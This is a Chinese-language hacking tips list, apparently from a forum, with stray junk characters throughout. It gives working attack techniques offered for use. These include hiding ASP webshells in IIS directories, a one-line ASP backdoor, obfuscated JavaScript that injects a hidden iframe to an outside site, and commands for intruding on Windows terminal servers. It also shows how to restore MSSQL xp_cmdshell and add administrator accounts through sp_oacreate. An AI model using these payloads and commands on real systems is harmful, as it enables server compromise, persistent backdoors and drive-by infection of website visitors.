执行后可以用AT命令查看新加的任务- j% v* A3 a+ j) X/ U) W' l
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。4 K1 N( S& c: I: z ` C0 O
! ~/ K x h( o& T% E0 z
53、隐藏ASP后门的两种方法$ b+ B# u2 J$ ]
1、建立非标准目录:mkdir images..\# `/ a; i/ |) P$ Y8 R0 w
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp2 v7 k5 L( ]! P; I6 ?
通过web访问ASP木马:http://ip/images../news.asp?action=login. J& `. P1 {1 a( b# |! t& Z
如何删除非标准目录:rmdir images..\ /s Q9 Q: v* N4 _4 a1 T
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
( g; t9 X' |; ~" j* `% Amkdir programme.asp8 P% j/ s0 e' L I. M( j
新建1.txt文件内容:<!--#include file=”12.jpg”-->- {. l) w. c! v6 i. {" C* U
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件( S7 R q+ x5 f! B P/ {+ y# ~
attrib +H +S programme.asp
9 I6 s! A0 a1 ]) s [* V9 Y通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt/ \9 G3 q* |& N$ K
`5 r y* O+ T4 M0 E
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。9 M8 y5 i5 ^- B3 h" z, F+ a' f. o
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
* B$ k8 C3 K: O0 \, t" j. r
9 A* N$ {) E; b% l/ ~7 T55、JS隐蔽挂马
$ K, E/ Y6 C1 V! d% C0 ~- `1.
+ b8 B% L$ z& p( S5 \1 kvar tr4c3="<iframe src=ht";
0 r- { n" n1 Vtr4c3 = tr4c3+"tp:/";
3 C. P* R6 W6 gtr4c3 = tr4c3+"/ww";
. k0 P1 b: G/ X' p4 S% {tr4c3 = tr4c3+"w.tr4";* c% }/ d4 t+ `+ y
tr4c3 = tr4c3+"c3.com/inc/m";
$ G: a; K* g6 ^tr4c3 = tr4c3+"m.htm style="display:none"></i";
0 d: V& C! r6 M; Qtr4c3 =tr4c3+"frame>'";
% [: T" j1 x6 edocument.write(tr4c3);
6 e: {" q) _# A- W0 L6 Z p& c2 S避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。$ S+ \! G* k$ c& I
8 b7 y+ T- o' @- t& n2.
" n+ v, m8 I6 I6 B5 w转换进制,然后用EVAL执行。如
* I+ b2 B- E& V2 ` p1 b) E+ ?6 _eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
! w+ t9 k; X, v# M/ W/ }不过这个有点显眼。
* Y4 N8 W b0 O; l3.
" L, ]9 s' t/ Mdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
- O9 v6 y! ^. V% b最后一点,别忘了把文件的时间也修改下。, [: U, K {1 v, V# Y& ]$ Q
* e5 W8 ?4 L& E4 y7 d( C5 ]2 j
56.3389终端入侵常用DOS命令+ ?* o' k+ p6 L l( p
taskkill taskkill /PID 1248 /t
# V1 r) O& ]8 |. w* m5 G( J# C% K" I1 W& `4 k* E T
tasklist 查进程3 U- V' E, D7 G2 ?4 B: f. ^( n: Y
+ N: q6 v% W" w" U. d7 E" j* {7 Ecacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
' l6 h' k' ?- oiisreset /reboot
5 [3 B/ W" _8 K5 X6 b3 R$ [3 Utsshutdn /reboot /delay:1 重起服务器: u8 m: a0 |3 v# Z' o! B
( V8 J# }8 }0 E% `1 T7 c
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,2 g+ h) k+ g6 F; j
l" d, N9 o7 B" {+ Y$ U
query user 查看当前终端用户在线情况
; D- I/ f8 @) X% `/ Y! p* I P& ]& [
) [: _) E' v! N* i0 X! h要显示有关所有会话使用的进程的信息,请键入:query process *& f7 d1 q. F5 J! w) ]( [) O0 _
2 H. D0 m% l/ B4 I1 |! }* p
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2 b3 l) V5 H7 F8 h( D
1 j3 [2 p9 N |2 G要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
6 r9 V, P+ n, [7 B' A" c z( Q1 S- E2 r3 C
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02, C5 q6 f L9 {, V, [
8 o2 g$ E- \- O; D- D1 L命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启( t9 {' `2 t6 l4 U, D6 W& k N6 i
4 U( i) V, d( x( w3 ?3 o y命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
: }9 m# R- x& E' ?/ c4 j- J$ k1 z1 [* I
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。" r! F% f) h" F3 O. e
# w* I( d# k) Y* \
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机; X$ C* u' ~" H" _1 S3 }9 O$ I
, o2 B3 N1 f4 }56、在地址栏或按Ctrl+O,输入:+ j5 I$ F* }6 I% n3 M5 m3 v
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;& k0 t9 P2 F( h' h" c w) A
B6 A# w& P$ I T! p$ u源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
8 h- A4 K/ i; |; ]! U0 j0 E+ ]1 c5 U. p7 y3 K# d9 A2 d
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
: p4 |, c1 H: B8 S用net localgroup administrators是可以看到管理组下,加了$的用户的。% F2 t3 A4 h3 a$ [- K# q2 u0 L; }1 r
- Y$ a/ e# i$ i8 m! l58、 sa弱口令相关命令
) q- G0 F( N6 Z: T
$ C& }- d- P/ ~. L5 c) D: z一.更改sa口令方法:
9 W) v) {3 o9 w G: |用sql综合利用工具连接后,执行命令:7 c, ^0 R) I" u: @5 G# {
exec sp_password NULL,'20001001','sa'' H! l- G @6 t; s
(提示:慎用!)
& |/ n: r/ J* ~( Y5 m+ P0 Q2 q( q
1 J* D$ _) y" ^4 V二.简单修补sa弱口令.0 q2 I) x) @* t* M2 j, {+ C
; |8 I3 t- b5 i U5 |. W" h方法1:查询分离器连接后执行:( Y7 K, E, F3 Q9 V
if exists (select * from
* e0 d; R' x. C6 A/ F/ G! Ddbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and7 o9 y9 Q0 I) Q* S8 u
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)% R& ~8 l6 [7 d6 {" P
. a: U) z; c3 e) D- x4 W/ |4 A. g
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
, L. ~: w! A/ A3 v3 D5 Q! E% @, z6 I
. `) b% r5 m8 M/ E/ U( W0 F2 HGO
' s) m+ L5 h. ?+ ^, B( L9 n
4 k) L" l4 g+ u! w4 S; z9 n) r然后按F5键命令执行完毕% v1 M4 s' [; w# Z
# p; X1 q5 I9 Z' W- {# @9 b方法2:查询分离器连接后
1 X( v$ a H- v# Z4 P第一步执行:use master
! r( e* ^8 |- ~. N第二步执行:sp_dropextendedproc 'xp_cmdshell'
4 q' n) Y8 Z( b, H0 h0 t然后按F5键命令执行完毕9 j9 @( M( L* A# s. I
% p5 k% O* Y3 _& w" D, f, [- Q& d/ l/ q+ z
三.常见情况恢复执行xp_cmdshell.
( L+ o0 ]2 H: _. ~3 M: B+ s. j" M
7 D' g( h' B' Q" t4 z! O8 I- A4 G3 K
1 未能找到存储过程'master..xpcmdshell'.$ N# g. C$ C: Z* n J$ Y# a5 c
恢复方法:查询分离器连接后,
g1 X, q% M! b9 L$ B7 k, c1 Z第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
$ ?8 @( P+ H1 K, r" [1 v第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 { }+ ~0 W4 R0 O
然后按F5键命令执行完毕& e D3 \( z5 v4 m0 V
* J( S4 ^. d: W3 N3 n) q2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
0 [' F g; U2 x" t! m恢复方法:查询分离器连接后,2 }6 U3 Z( o: W# O! a
第一步执行:sp_dropextendedproc "xp_cmdshell"& n) `, Q! `) G0 G- [
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! C# v( O+ Z- i m/ ]% C
然后按F5键命令执行完毕! @; z a$ b1 @& H1 Y0 x. h
8 o9 B; ^3 D8 o, P5 X) V# `3 N) W; P
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)0 p! Z( _* n. c9 `" t4 b
恢复方法:查询分离器连接后,( G4 p2 X9 k+ [/ w
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'* e- t% z' T5 D, x( j6 d. @/ J+ r2 W; O
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
) f- V/ V% d2 j% i$ h7 ?0 Z" L, o T然后按F5键命令执行完毕
/ o9 R: ]1 N9 v! U& R
/ U3 ^# c; ~1 A9 }: \四.终极方法.. [: I8 q3 \0 p h: l
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: z9 N5 ^4 B, E/ `
查询分离器连接后,
' k* ^4 k8 R0 E7 e1 M+ ~8 W2000servser系统:' P( w1 V7 `) k$ |% R2 z; S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'* _! ~ p8 L( V/ |8 m
8 S. h; m- d. `9 Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: y# N* o' n; P, C
2 y/ j) q: e6 @ s( Lxp或2003server系统:8 S% q3 n* o" @
" o# U1 S8 ~2 i) t6 B1 ^4 ]3 X9 g' R6 U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
: P1 ]5 N0 F" g; Z2 f! K. `5 X9 D- V3 |' b) E' ^; [/ ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
7 h7 A. O, e: f7 B5 F |